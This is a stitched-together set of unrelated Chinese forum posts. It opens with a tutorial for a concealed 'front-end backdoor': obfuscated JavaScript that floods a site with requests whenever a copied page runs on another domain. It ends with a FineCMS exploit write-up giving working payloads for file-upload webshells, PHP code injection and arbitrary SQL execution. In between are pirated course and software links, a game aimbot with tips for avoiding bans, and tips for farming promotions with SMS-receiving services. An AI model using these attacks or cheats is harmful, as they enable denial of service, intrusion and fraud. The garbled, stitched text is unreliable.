这个只能算个思路~~~
我相信大家也知道，所有前端页面的源码都是开源的，自己辛辛苦苦写的脚本，被人一个复制，作品就完了，经过10多天的苦思冥想，我自己想出了一个脚本，那就是在自己的前端页面留下后门，如果别人把你的源码复制走了，那么就对对方进行CC反击

思路是不是很猥琐，嘎嘎  整体思路就是，对自己做一个判断，判断如果不是自己的域名，就发起CC反击

本章节需要JS基础

这里我先打印输入自己的域名

url = window.location.href;
 
document.write("<br>url="+url)

可以看到， 域名是http://localhost/1.html 下面做一个判断，如果域名不是 http://localhost/1.html那么就发起cc攻击

if(url!='http://localhost/2tml'){   //判断域名如果不是http://localhost/2tml就执行下面的代码
 
url = window.location.href; //保存域名变量
 
  
 
function cctest() {
 
url = window.location.href;
 
var cc = new Image() //新创建一个图片
 
var rand = Math.floor(Math.random() * 2000) //图片get请求随机数
 
cc.src =url+'?'+rand+'.'
 
cc.onerror="cctest()"
 
cc.onload="cctest()"
 
cctest()
 
}
 
setInterval(cctest, 10)
 
setInterval(cctest, 10)
 
setInterval(cctest, 10)
 
}
 
//CC攻击

这里我的域名是http://localhost/1.html，不符合判断的要求，那么他就会发起CC攻击，假设我们是偷走源码的人，现在我们打开这个网页试试看

刚刚卡死了

可以看到，谷歌占用进程百分之60.还在不断的上涨，

好了，前端后门就完成了，但是，直接这样放上去肯定是不行的，因为大部分复制你源码的人，都懂点JS，所以我们要 “加工”

随便用个编码机制吧~~

//获取页面完整地址
 
url = window.location.href;
 
document.write("<br>url="+url)
 
  
 
if(url!='http://localhost/2tml'){        //判断，如果当前域名不是 localhost/2htm就发起CC攻击，这里你可以修改为自己的域名
 
  
 
//一下开始攻击
 
eval(
 
eval(String.fromCharCode(9,117,114,108,32,61,32,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,59,13,102,117,110,99,116,105,111,110,32,99,99,116,101,115,116,40,41,32,123,13,117,114,108,32,61,32,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,59,13,118,97,114,32,99,99,32,61,32,110,101,119,32,73,109,97,103,101,40,41,13,118,97,114,32,114,97,110,100,32,61,32,77,97,116,104,46,102,108,111,111,114,40,77,97,116,104,46,114,97,110,100,111,109,40,41,32,42,32,50,48,48,48,41,13,99,99,46,115,114,99,32,61,117,114,108,43,39,63,39,43,114,97,110,100,43,39,46,39,13,99,99,46,111,110,101,114,114,111,114,61,34,99,99,116,101,115,116,40,41,34,13,99,99,46,111,110,108,111,97,100,61,34,99,99,116,101,115,116,40,41,34,13,99,99,116,101,115,116,40,41,13,125,13,115,101,116,73,110,116,101,114,118,97,108,40,99,99,116,101,115,116,44,32,49,48,41,13,115,101,116,73,110,116,101,114,118,97,108,40,99,99,116,101,115,116,44,32,49,48,41,13,115,101,116,73,110,116,101,114,118,97,108,40,99,99,116,101,115,116,44,32,49,48,41)))
 
}

◎片　　名　极盗车神 Baby Driver
◎又　　名　玩命再劫(台)/宝贝神车手(港)/娃娃脸司机/宝宝车神/宝贝司机/小司机，带带我(豆友译名)/Drive Baby Drive
◎年　　代　2017
◎地　　区　英国/美国
◎类　　型　动作/音乐/犯罪
◎语　　言　英语/美国手语
◎上映日期　2017-08-25(中国大陆)/2017-03-11(西南偏南电影节)/2017-06-28(英国/美国)
◎IMDb链接     http://www.imdb.com/title/tt3890160/
◎IMDb评分     8.1/10 from 107,450 users
◎豆瓣链接　https://movie.douban.com/subject/25933890/
◎豆瓣评分　7.2/10 from 45,234 users
◎片　　长　113分钟 / 112分钟(中国大陆)
◎导　　演　埃德加·赖特  Edgar Wright
◎主　　演　安塞尔·艾尔高特  Ansel Elgort
凯文·史派西  Kevin Spacey
杰米·福克斯  Jamie Foxx
乔恩·哈姆  Jon Hamm
艾莎·冈萨雷斯  Eiza González
莉莉·詹姆斯  Lily James
乔·博恩瑟  Jon Bernthal
米迦·霍华德  Micah Howard
摩根·布朗  Morgan Brown
CJ·琼斯  CJ Jones
斯凯·费雷拉  Sky Ferreira
兰斯·帕默  Lance Palmer
哈德森·米克  Hudson Meek
薇薇安娜·查维斯  Viviana Chavez
哈尔·怀特塞德  Hal Whiteside
弗利  Flea
兰尼·琼  Lanny Joon
克莱·多纳休·丰特诺  Clay Donahue Fontenot
R·马科斯·泰勒  R. Marcos Taylor
帕特里克·R·沃克  Patrick R. Walker
保罗·威廉姆斯  Paul Williams
维布尔·弗利茨杰拉德  Wilbur Fitzgerald
◎简　　介
由英伦鬼才导演埃德加·赖特执导编剧的《极盗车神》，讲述了关于天赋极高的犯罪团伙司机——名为“Baby”的年轻人的故事。Baby（安塞尔·艾尔高特 Ansel Elgort 饰）专门负责帮银行抢劫犯开车逃脱。Baby因童年的一场事故导致耳疾，要靠专属的音乐来掌控开车节奏。偶然的一次邂逅，他与餐厅女服务生（莉莉·詹姆斯 Lily James 饰）坠入爱河，并想就此金盆洗手。头目老大道哥（凯文·史派西 Kevin Spacey 饰）表示，只要Baby再完成最后一次任务，就可以给他自由。殊不知，巨大的危险和挑战在等待着Baby……

种子下载链接：哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈

【01】2017年6月X东方VIP密训班
[强化班] 2017年6月份四级强化班阅读课程[暂定课时]：刘琦链接：http://pan.baidu.com/s/1bp5VK4n 密码：nhkb
[强化班] 2017年6月份四级强化班写作课程[暂定课时]：任瑞罡链接：http://pan.baidu.com/s/1pLyLIp9 密码：fo29
[强化班] 2017年6月份四级强化班听力课程[暂定课时]：信心链接：http://pan.baidu.com/s/1gf3LHXT 密码：ff3x
[强化班] 2017年6月份四级强化班翻译课程[暂定课时]：朱杰骅链接：http://pan.baidu.com/s/1hsqS4lu 密码：47h1
[基础班] 2017年6月份四级基础高频词汇精讲[暂定课时]：刘畅链接：http://pan.baidu.com/s/1hs1GPJQ 密码：q35d
[基础班] 2017年6月份四级★新概念二册精华版★[126课时]：田静链接：http://pan.baidu.com/s/1i4ARXGT 密码：1x9r
[基础班] 2017年6月份四级基础语法精讲[21课时]：田静链接： http://pan.baidu.com/s/1hrNftSo 密码：f6eh
[导学班] 2017年6月份四级级备考导学 [2课时]：刘畅待更新
【02】2017年6月XDF密训：★四级扎实基础直播课
2017年6月XDF密训：★四级扎实基础直播课链接：http://pan.baidu.com/s/1gfsWEx9 密码：1uzb
【03】2017年6月XDF密训：★四级技巧拔高直播课
2017年6月XDF密训：★四级技巧拔高直播课链接：http://pan.baidu.com/s/1jIdXgoQ 密码：urna
【04】2017年6月XDF密训直播课：四级应试口语课
2017年6月XDF密训直播课：四级应试口语课链接：http://pan.baidu.com/s/1nvPUlZF 密码：nw7z
【05】2017年6月有道考神团队四级
2017年6月有道考神四级春季全程通关班链接：http://pan.baidu.com/s/1i5yYXgD 密码：p1nw
2017年6月有道考神四级寒假定制班链接：http://pan.baidu.com/s/1nuMqJ8X 密码：9r1m
【06】2017年6月文都四级
[基础班] 2017年6月份文都四级听力精讲[16课时]：谭建波链接：http://pan.baidu.com/s/1hs0ytgS密码：l4hh
[基础班] 2017年6月份文都四级语法精讲[12课时]：何威威链接：http://pan.baidu.com/s/1gfiORDp 密码：7248
[基础班] 2017年6月份文都四级词汇夯实基础课程（VIP）[10课时]：刘一男链接：http://pan.baidu.com/s/1c2pFltu 密码：xucn
[导学班] 2017年6月份文都四级导学班高分规划[2课时]：谭建波链接：http://pan.baidu.com/s/1ceTWtw 密码：4xt2
[导学班] 2017年6月份文都四级导学班高分规划[2课时]：何凯文链接：http://pan.baidu.com/s/1jHLGBMQ 密码：xj5j
【07】2017年6月商志四级
2017年6月四级必过抢分班-写作 商志链接：http://pan.baidu.com/s/1jIwqrMA 密码：2qo1
2017年6月四级必过抢分班-深度阅读 商志链接：http://pan.baidu.com/s/1dE4rKGD 密码：7ge9
2017年6月四级必过抢分班-选词填空 商志链接：http://pan.baidu.com/s/1o7GiQ1c密码：qn2i
2017年6月四级必过抢分班-导学 商志链接：http://pan.baidu.com/s/1o7EgUp0 密码：0k9b
【08】2017年6月V研客四级
2017年考霸学堂6月份四级（阅读）[15课时]：徐密杉链接：http://pan.baidu.com/s/1eRWAhiy 密码：bvkq
2017年考霸学堂6月份四级（写作）[6课时]：宋平明链接：http://pan.baidu.com/s/1kVQA50r 密码：04w8
2017年考霸学堂6月份四级（听力）[16课时]：李尚龙链接：http://pan.baidu.com/s/1dFqUT7j 密码：pa6v
2017年考霸学堂6月份四级（翻译）[17课时]：宋平明链接：http://pan.baidu.com/s/1hrMwHmc 密码：ji3m
2017年考霸学堂6月份四级（词汇）[12课时]：杨子江链接：http://pan.baidu.com/s/1boTYujt 密码：gpue
2017年考霸学堂6月份四级（长难句）[15课时]：徐密杉链接：http://pan.baidu.com/s/1i5iFpUt密码：7gqs

2017年英语六级课程提取地址：
【01】2017年6月X东方VIP密训班
[强化班] 2017年6月份六级强化班阅读课程[暂定课时]：刘琦链接：http://pan.baidu.com/s/1dE2nCtz 密码：q1gj
[强化班] 2017年6月份六级强化班写作课程[暂定课时]：任瑞罡链接：http://pan.baidu.com/s/1bzBTfS 密码：li4h
[强化班] 2017年6月份六级强化班听力课程[暂定课时]：信心链接：http://pan.baidu.com/s/1eSCBpuy 密码：yozj
[强化班] 2017年6月份六级强化班翻译课程[暂定课时]：朱杰骅链接：http://pan.baidu.com/s/1bFkZPc 密码：pijj
[基础班] 2017年6月份六级基础高频词汇精讲[8课时]：刘畅链接：http://pan.baidu.com/s/1o8Cun5C 密码：ik7c
[基础班] 2017年6月份六级直播课★新概念三册精华版[13课时]：李盛链接：http://pan.baidu.com/s/1miLRoTU密码：ml4n
[基础班] 2017年6月份六级基础语法精讲[21课时]：田静链接：http://pan.baidu.com/s/1qYlltLy 密码：vk1e
[导学班] 2017年6月份六级备考导学 [2课时]：刘畅链接：http://pan.baidu.com/s/1gfdwm9l 密码：2z8o
【02】2017年6月XDF密训：★六级扎实基础直播课
【02】2017年6月XDF密训：★六级扎实基础直播课链接：http://pan.baidu.com/s/1i4Ric4H 密码：uegr
【03】2017年6月XDF密训：★六级技巧拔高直播课
【03】2017年6月XDF密训：★六级技巧拔高直播课链接：http://pan.baidu.com/s/1o7Eg7mq 密码：ywuc
【04】2017年6月XDF密训直播课：六级应试口语课
【04】2017年6月XDF密训直播课：六级应试口语课链接：http://pan.baidu.com/s/1jIJUArW 密码：0otg
【05】2017年6月有道考神团队六级
2017年6月有道考神六级春季全程通关班链接：http://pan.baidu.com/s/1gfonGcz 密码：pepy
2017年6月有道考神六级寒假定制班链接：http://pan.baidu.com/s/1hs62iWG 密码：m9kd
【06】2017年6月文都六级
[基础班] 2017年6月份文都六级听力精讲[14课时]：谭建波链接：http://pan.baidu.com/s/1skL43NJ 密码：7d8r
[基础班] 2017年6月份文都六级词汇夯实基础课程（VIP）[12课时]：刘一男链接：http://pan.baidu.com/s/1i55KbtF 密码：avwu
[导学班] 2017年6月份文都六级导学班高分规划[2课时]：谭建波链接：http://pan.baidu.com/s/1dE7DMnf 密码：wqpn
[导学班] 2017年6月份文都六级导学班高分规划[2课时]：何凯文链接：http://pan.baidu.com/s/1miBdAp6 密码：mspk
【07】2017年6月商志六级
2017年6月六级必过抢分班-选词填空 商志链接：http://pan.baidu.com/s/1dFmpwid 密码：xuoe
2017年6月六级必过抢分班-导学 商志链接：http://pan.baidu.com/s/1jH6hIPS 密码：ir4a
【08】2017年6月V研客六级
2017年考霸学堂6月份六级（阅读）[15课时]：徐密杉链接：http://pan.baidu.com/s/1gfDl5VP 密码：9mw2
2017年考霸学堂6月份六级（写作）[6课时]：宋平明链接：http://pan.baidu.com/s/1dFfzDdB 密码：8jyg
2017年考霸学堂6月份六级（听力）[18课时]：李尚龙链接：http://pan.baidu.com/s/1hsNsRFQ 密码：bhow
2017年考霸学堂6月份六级（翻译）[6课时]：宋平明链接：http://pan.baidu.com/s/1pKEaR3t 密码：wxsx
2017年考霸学堂6月份六级（词汇）[13课时]：杨子江链接：http://pan.baidu.com/s/1pLIuSOV 密码：k91l
2017年考霸学堂6月份六级（长难句）[17课时]：徐密杉链接：http://pan.baidu.com/s/1c1At9gW 密码：mwpm

链接：https://y.qq.com/apg/77/index.html

 
1：使用自己实名的微信号 绑微众卡，从新绑微众卡的微信号参加活动 即可 多撸一次。

2：注册新的微信号 接码是2元左右成本，撸完一个注销一个实名 或者 注销微信 （因为一个身份证 只能实名5个号）

再说了 你撸活动注册实名的微信 留着也没用。

建议自己有多个实名微信的 多撸几次即可，

接码注册 ，撸完注销，就好了。

PS ：暂时需要接码的，可以找我，上个月在讯码注册的帐号上还有好几块钱。估计够用了

大学德语高教版本mp3格式 链接: http://pan.baidu.com/s/1kTpaKab 密码: 7cnw
基础德语入门教程mp3格式 链接: http://pan.baidu.com/s/1sj5J6YL 密码: yajk
新东方德语入门一月通 链接: http://pan.baidu.com/s/1pJGCXZH 密码: mcvn
俄语小故事175集MP3格式 链接: http://pan.baidu.com/s/1bnCXGkf 密码: nis4
实用商务俄语口语王全集MP3格式 链接: http://pan.baidu.com/s/1gd6dTC3 密码: enen
法语零基础入门音标语音 链接: http://pan.baidu.com/s/1gdIVj1L 密码: ivtg
法语入门走遍法国第一册上通关班 链接: http://pan.baidu.com/s/1jG5XPuY 密码: 5xje
新东方法语入门一月通 链接: http://pan.baidu.com/s/1bnm9odT 密码: j27n
走遍法国语音教程MP3格式 链接: http://pan.baidu.com/s/1bndfORH 密码: 5jfq
阿里郎电视台韩语视频教学 链接: http://pan.baidu.com/s/1i3nITM1 密码: 941a
标准韩语基础会话 链接: http://pan.baidu.com/s/1hqxowvE 密码: mfs8
标准韩语语音入门 链接: http://pan.baidu.com/s/1o6KcOzS 密码: cmai
崔羲秀初级韩国语 链接: http://pan.baidu.com/s/1c0cxOLq 密码: 4uiu
韩国高手会“踢的革命”教学片 链接: http://pan.baidu.com/s/1hqpgXTU 密码: h6df
韩国会话3月通 链接: http://pan.baidu.com/s/1qW616Pm 密码: zsc6
韩国外国语大学《韩国语教程》 链接: http://pan.baidu.com/s/1mgmWRrE 密码: 2u4y
韩国语课堂旅游基础会话 链接: http://pan.baidu.com/s/1mgtI0Jm 密码: mdpf
韩语口语8000字mp3格式 链接: http://pan.baidu.com/s/1bnApR5P 密码: xwu4
韩语口语900句mp3音频 链接: http://pan.baidu.com/s/1c010qru 密码: cdsu
韩语自学视频教程 链接: http://pan.baidu.com/s/1hqAL6TI 密码: ic27
老版Let’sSpeakKorean视频教学 链接: http://pan.baidu.com/s/1pJ63AUR 密码: pqnk
临时急需要马上说韩语 链接: http://pan.baidu.com/s/1sjJWInF 密码: 8q5p
零起点韩语口语入门 链接: http://pan.baidu.com/s/1pJ9RvHx 密码: gbhk
零起点韩语口语入门王视频 链接: http://pan.baidu.com/s/1gd5xVhD 密码: h7p8
民族出版社韩国语MP3格式 链接: http://pan.baidu.com/s/1i3Gjn9N 密码: w7i7
实用初级韩国语教程 链接: http://pan.baidu.com/s/1mg9r5lY 密码: dx2z
实用韩国语教程 链接: http://pan.baidu.com/s/1mgtI0JI 密码: fi3r
实用韩语单词500个 链接: http://pan.baidu.com/s/1qW9jtDU 密码: 4eyk
我为韩语狂入门篇 链接: http://pan.baidu.com/s/1qWn4Hmk 密码: ty7w
无师自通韩国语视频教程 链接: http://pan.baidu.com/s/1i3H5hhN 密码: 6mhy
新版Let’sSpeakKorean 260集视频 链接: http://pan.baidu.com/s/1mgAD3eC 密码: rd7r
新编中级韩国语MP3格式 链接: http://pan.baidu.com/s/1dD0cxNj 密码: ysxp
新东方韩语入门一月通 链接: http://pan.baidu.com/s/1c06kchE 密码: ng25
新概念韩国语视频 链接: http://pan.baidu.com/s/1kTpaKbd 密码: kpbh
中韩交流标准韩国语 链接: http://pan.baidu.com/s/1qW5fBTq 密码: sxqi
中韩交流实用韩国语 链接: http://pan.baidu.com/s/1pJusrNH 密码: ft8u
Erin挑战！学会日语视频25讲 链接: http://pan.baidu.com/s/1ntIcYnf 密码: m9bn
Go Go Japan第一季8集 链接: http://pan.baidu.com/s/1bnCXGAV 密码: h6p8
北海道漫游记 链接: http://pan.baidu.com/s/1bnrsWl5 密码: 1xa5
标准日本语 链接: http://pan.baidu.com/s/1ntABznz 密码: bsgv
标准日语初级教程 链接: http://pan.baidu.com/s/1bn4kmfl 密码: ckji
别笑！我是日语学习书MP3格式 链接: http://pan.baidu.com/s/1pJOK2uB 密码: 4h5p
超简单-手绘旅游日语MP3格式 链接: http://pan.baidu.com/s/1ntoqMTF 密码: sjrg
从日本中小学课本学日文 链接: http://pan.baidu.com/s/1jG2AaA6 密码: v1db
大家的日本语(1-2册)MP3格式 链接: http://pan.baidu.com/s/1qWoQC8k 密码: 3g8k
大学日语专业四级轻松过级一点通mp3格式 链接: http://pan.baidu.com/s/1kTDxt3L 密码: mppu
蛋蛋动漫日语学堂70讲 链接: http://pan.baidu.com/s/1gd2aibx 密码: jxn9
东京印象 链接: http://pan.baidu.com/s/1o6rC5rc 密码: k98i
读唐诗学日语汉字MP3格式 链接: http://pan.baidu.com/s/1mg3lUNQ 密码: 4a2r
短期掌握日本语能力测试N1级 链接: http://pan.baidu.com/s/1sjFSWwt 密码: b74a
疯狂日语MP3版7讲 链接: http://pan.baidu.com/s/1sjA3rAl 密码: sqvk
跟NHK学简明日语 链接: http://pan.baidu.com/s/1qW9Pw3y 密码: gt9k
沪江日语 链接: http://pan.baidu.com/s/1pJ0xUTP 密码: 9xi3
环游日本学日语 链接: http://pan.baidu.com/s/1fPIZc 密码: fete
叫醒耳朵日语会话通3000句日常日语句型 链接: http://pan.baidu.com/s/1pJiNaqf 密码: 71yd
口语及短句888个4讲MP3格式 链接: http://pan.baidu.com/s/18pZXG 密码: div3
来去日本第二季17集 链接: http://pan.baidu.com/s/1sjn2H1V 密码: 23ve
赖户内海心动之旅5集 链接: http://pan.baidu.com/s/1qWzFUI4 密码: 9feh
老外最想与你聊的100日语话题 链接: http://pan.baidu.com/s/1bfYUU 密码: xu45
日本九州北部之旅5集 链接: http://pan.baidu.com/s/1kTnERVD 密码: 817r
日本语能力测试1234级词汇背诵手册MP3版 链接: http://pan.baidu.com/s/1gdCP8zD 密码: w42w
日英双解辞典 链接: http://pan.baidu.com/s/1ntwyoZJ 密码: 7jnd
日语300句 链接: http://pan.baidu.com/s/1pJ3LK3T 密码: 7vgd
日语初级1-24集MP3格式 链接: http://pan.baidu.com/s/1mgBtz2g 密码: 8x7r
日语基础中央广播电视大学教学视频40集 链接: http://pan.baidu.com/s/1c054gBQ 密码: egjr
日语口译综合能力（二级）mp3格式 链接: http://pan.baidu.com/s/1sjsSriH 密码: uj4r
日语口语900句音频教程 链接: http://pan.baidu.com/s/1jGxQqfs 密码: q83c
日语口语王想说就说mp3格式 链接: http://pan.baidu.com/s/1eQ2cjse 密码: gyk1
日语能力考试2级听力模拟训练DOC文本MP3格式 链接: http://pan.baidu.com/s/1sjt8qC1 密码: ce8h
日语能力考试二级听力模拟训练MP3格式 链接: http://pan.baidu.com/s/1hqhFz1a 密码: gbxm
日语一月通全套教程合集 链接: http://pan.baidu.com/s/1ntl8WpN 密码: 6v1u
商务日语教程 链接: http://pan.baidu.com/s/1i3pKT4D 密码: mn42
上外新编日语答疑解难视频 链接: http://pan.baidu.com/s/1o6zJZN8 密码: n3v4
生活日语半日通 链接: http://pan.baidu.com/s/1c0tsMFA 密码: 8ukk
实用初级日语视频教程32讲 链接: http://pan.baidu.com/s/1fPIZO 密码: ev2w
实用日语口语句典MP3格式 链接: http://pan.baidu.com/s/1sj2vHST 密码: 6bmh
哇!原来这句日语这样说! 链接: http://pan.baidu.com/s/1o67l6no 密码: zmpq
无师自通日本语口语MP3格式 链接: http://pan.baidu.com/s/1ntCDtd3 密码: 5sya
现在就说日语 链接: http://pan.baidu.com/s/1c0lRrfq 密码: tc69
新版标准日本语 链接: http://pan.baidu.com/s/1sj0ZPMX 密码: fmgr
新编日语1-4册MP3格式全套 链接: http://pan.baidu.com/s/1kT3nVIB 密码: eurw
新编日语教程1-5册MP3格式 链接: http://pan.baidu.com/s/1qWOI1Uc 密码: gxs5
新编日语修订本mp3格式4册 链接: http://pan.baidu.com/s/1kTzQh3x 密码: 861q
新编生活日语视频25讲 链接: http://pan.baidu.com/s/1qWFUUq4 密码: 7ipe
新东方日语讲义 链接: http://pan.baidu.com/s/1mgy2jA4 密码: jfjc
新东方日语入门一月通 链接: http://pan.baidu.com/s/1gdvo8bL 密码: 2v9w
新东方日语一级讲座视频教程 链接: http://pan.baidu.com/s/1qWBlnC4 密码: mrtv
新概念日语视频教学15集 链接: http://pan.baidu.com/s/1g5ECe 密码: hn7j
新日本语能力测试N3词汇背诵手册mp3版 链接: http://pan.baidu.com/s/1o6A9vPS 密码: xw5p
学日语高手系列-流行口语及短句888个 链接: http://pan.baidu.com/s/1c0Er5WO 密码: 6xkt
樱花日语多媒体课程12级别 链接: http://pan.baidu.com/s/1o6qq9cu 密码: 2hfg
原来日语这样说MP3格式71讲 链接: http://pan.baidu.com/s/1dDItprb 密码: epxa
张向荣日语教程 链接: http://pan.baidu.com/s/1kTlDbbL 密码: ann5
中日交流标准日本语 链接: http://pan.baidu.com/s/1mgsw65U 密码: 6dav
走遍日本教程 链接: http://pan.baidu.com/s/1o60zW9s 密码: axh3
大学泰语听力教程 链接: http://pan.baidu.com/s/1eQ2cjvk 密码: 43v7
基础泰语MP3格式 链接: http://pan.baidu.com/s/1eQ8NOiu 密码: yhdx
实用初级泰国语视频教学 链接: http://pan.baidu.com/s/1o6zee3g 密码: n33g
泰语入门基础课程文字教程 链接: http://pan.baidu.com/s/1o6j4Znc 密码: kfam
新东方西班牙语入门一月通 链接: http://pan.baidu.com/s/1hqyAvuW 密码: j7kb
新东方新概念英语1-4册 链接: http://pan.baidu.com/s/1o6MKDPC 密码: 3ay4
新概念英语1-4册视频教程 链接: http://pan.baidu.com/s/1jGAH7JC 密码: wrsu
新概念英语精品课堂mp3格式 链接: http://pan.baidu.com/s/1bnbJUe7 密码：3ara

365天英语口语大全 链接: http://pan.baidu.com/s/1dhTF4 密码: eu3w
9小时快学国际音标 链接: http://pan.baidu.com/s/1gdEl1BX 密码: ba37
海伦从零开始英语音标 链接: http://pan.baidu.com/s/1ntkTbb7 密码: x12k
新东方4+1课堂教程 链接: http://pan.baidu.com/s/1mgxgosg 密码: 69tq
新东方王强口语全集 链接: http://pan.baidu.com/s/1sjC5hmt 密码: au3a
英语口音纠正课程 链接: http://pan.baidu.com/s/1ucP3o 密码: ygcn
英语口语8000句 链接: http://pan.baidu.com/s/1kTCHsI7  密码：9qqr

英语口语900句系列 链接: http://pan.baidu.com/s/1qWMa9u0 密码: 2t3t

更新内容：
修复第三方、客户端异常；

使用方法：
先打开逆战游戏客户端，然后打开辅助，点击辅助上的“开启”，接着登录游戏（注意：上游戏菜单卡死不能用，请重新退出游戏重新开启辅助）

注意事项：
１.用独立全屏窗口化（设置里面第一个）
２.最好上游戏不登QQ，别切出来干别的事情，如截图聊天等等。
３.PVP模式枪枪爆头请勿全程开启，否则挂得快。
４.推荐大家玩猎场只开枪枪爆头，稳定刷通宵。
５.建议玩几局就按F12键退出游戏一下，然后重新登录再玩。
请小号上游戏
下载地址：http://pan.stnts.com/s/0PnPQn2

为了避免非零基础人群感到身体不适、头晕恶心、易怒及粗口，请不要查看以下内容
↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑  ↑请不要无视黄色提示

TB购买的，分享给大家，包含安装教程、插件、主题

CMS演示 https://yfdxs.com/

博客演示 https://yfdxs.com/blog

更多详细信息请前往官方网站查询。谢谢

压缩包内容：

QQ群：385079302

点我加群

安装教程：
首先要求的是要https加密传输，也就是你域名要用https，太繁琐，可以多百度一下，论坛关于微信小程序的教程也很多，
但是从微信小程序目前发展的情况来看，还没有红到一定程度，说不定哪天就遇到了，这个不好说，大家测试把。

链接: https://pan.baidu.com/s/1nv61hXZ 密码: jvhn

0x1 Payload

0x11 任意文件上传

注册个用户，修改头像，选择一张图片马：

抓包，修改post中tx参数中的jpg为php：

getshell：

目录中的1位用户id，稍微爆破一下即可。 PS：谢谢大佬们提醒，这个uid可以直接在cookie中看到

0x12 任意代码执行

index.php?c=api&m=data2&auth=e174c30q733kceb0r4kkh5m8u3p1jnh6&param=action=cache%20name=MEMBER.1'];phpinfo();$a=['1

其中auth为：

24b16fede9a67c9251d3e7c7161c83ac的md5值

0x13 任意SQL语句执行

index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=action=sql%20sql='select%20user();'

auth值同上

0x2 代码分析

0x21 任意文件上传

/finecms/dayrui/controllers/member/Account.php 177~244

/**
 *  上传头像处理
 *  传入头像压缩包，解压到指定文件夹后删除非图片文件
 */
public function upload() {

    // 创建图片存储文件夹
    $dir = SYS_UPLOAD_PATH.'/member/'.$this->uid.'/';
    @dr_dir_delete($dir);
    !is_dir($dir) && dr_mkdirs($dir);

    if ($_POST['tx']) {
        $file = str_replace(' ', '+', $_POST['tx']);
        if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $file, $result)){
            $new_file = $dir.'0x0.'.$result[2];
            if (!@file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file)))) {
                exit(dr_json(0, '目录权限不足或磁盘已满'));
            } else {
                $this->load->library('image_lib');
                $config['create_thumb'] = TRUE;
                $config['thumb_marker'] = '';
                $config['maintain_ratio'] = FALSE;
                $config['source_image'] = $new_file;
                foreach (array(30, 45, 90, 180) as $a) {
                    $config['width'] = $config['height'] = $a;
                    $config['new_image'] = $dir.$a.'x'.$a.'.'.$result[2];
                    $this->image_lib->initialize($config);
                    if (!$this->image_lib->resize()) {
                        exit(dr_json(0, '上传错误：'.$this->image_lib->display_errors()));
                        break;
                    }
                }
                list($width, $height, $type, $attr) = getimagesize($dir.'45x45.'.$result[2]);
                !$type && exit(dr_json(0, '图片字符串不规范'));
            }
        } else {

            exit(dr_json(0, '图片字符串不规范'));
        }
    } else {
        exit(dr_json(0, '图片不存在'));
    }

// 上传图片到服务器
    if (defined('UCSSO_API')) {
        $rt = ucsso_avatar($this->uid, file_get_contents($dir.'90x90.jpg'));
        !$rt['code'] && $this->_json(0, fc_lang('通信失败：%s', $rt['msg']));
    }

    exit('1');
}

不用多解释了，直接任意文件上传。。

0x22 任意代码执行&&任意SQL语句执行

先说一下auth：
config.php
$config['sess_cookie_name'] = $site['SYS_KEY'].'_ci_session';

/finecms/dayrui/controllers/Api.php

直接可以再cookie中获取。

问题其实都出在了data2()这一个函数

/finecms/dayrui/controllers/Api.php

/**
 * 自定义数据调用（新版本）
 */
public function data2() {

    $data = array();

    // 安全码认证
    $auth = $this->input->get('auth', true);
    if ($auth != md5(SYS_KEY)) {
        // 授权认证码不正确
        $data = array('msg' => '授权认证码不正确', 'code' => 0);
    } else {
        // 解析数据
        $cache = '';
        $param = $this->input->get('param');
        if (isset($param['cache']) && $param['cache']) {
            $cache = md5(dr_array2string($param));
            $data = $this->get_cache_data($cache);
        }
        if (!$data) {

            // list数据查询
            $data = $this->template->list_tag($param);
            $data['code'] = $data['error'] ? 0 : 1;
            unset($data['sql'], $data['pages']);

            // 缓存数据
            $cache && $this->set_cache_data($cache, $data, $param['cache']);
        }
    }

    // 接收参数
    $format = $this->input->get('format');
    $function = $this->input->get('function');
    if ($function) {
        if (!function_exists($function)) {
            $data = array('msg' => fc_lang('自定义函数'.$function.'不存在'), 'code' => 0);
        } else {
            $data = $function($data);
        }
    }

    // 页面输出
    if ($format == 'php') {
        print_r($data);
    } elseif ($format == 'jsonp') {
        // 自定义返回名称
        echo $this->input->get('callback', TRUE).'('.$this->callback_json($data).')';
    } else {
        // 自定义返回名称
        echo $this->callback_json($data);
    }
    exit;
}

为什么说出在了这一个函数，因为通过这个函数可以调用到其他敏感函数，本来系统封装的函数不是给用户使用的。

可以看到，传入的参数直接进了$data = $this->template->list_tag($param);，这个函数里有什么，来截一部分：

/finecms/dayrui/libraries/Template.php

switch ($system['action']) {

    case 'cache': // 系统缓存数据

        if (!isset($param['name'])) {
            return $this->_return($system['return'], 'name参数不存在');
        }

        $pos = strpos($param['name'], '.');
        if ($pos !== FALSE) {
            $_name = substr($param['name'], 0, $pos);
            $_param = substr($param['name'], $pos + 1);
        } else {
            $_name = $param['name'];
            $_param = NULL;
        }

        $cache = $this->_cache_var($_name, !$system['site'] ? SITE_ID : $system['site']);
        if (!$cache) {
            return $this->_return($system['return'], "缓存({$_name})不存在，请在后台更新缓存");
        }

        if ($_param) {
            $data = array();
            @eval('$data=$cache'.$this->_get_var($_param).';');
            if (!$data) {
                return $this->_return($system['return'], "缓存({$_name})参数不存在!!");
            }
        } else {
            $data = $cache;
        }

        return $this->_return($system['return'], $data, '');
        break;

    ...

    case 'sql': // 直接sql查询

        if (preg_match('/sql=\'(.+)\'/sU', $_params, $sql)) {

            // 数据源的选择
            $db = $this->ci->db;

            // 替换前缀
            $sql = str_replace(
                array('@#S', '@#'),
                array($db->dbprefix.$system['site'], $db->dbprefix),
                trim(urldecode($sql[1]))
            );
            if (stripos($sql, 'SELECT') !== 0) {
                return $this->_return($system['return'], 'SQL语句只能是SELECT查询语句');
            }

            $total = 0;
            $pages = '';

            // 如存在分页条件才进行分页查询
            if ($system['page'] && $system['urlrule']) {
                $page = max(1, (int)$_GET['page']);
                $row = $this->_query(preg_replace('/select \* from/iUs', 'SELECT count(*) as c FROM', $sql), $system['site'], $system['cache'], FALSE);
                $total = (int)$row['c'];
                $pagesize = $system['pagesize'] ? $system['pagesize'] : 10;
                // 没有数据时返回空
                if (!$total) {
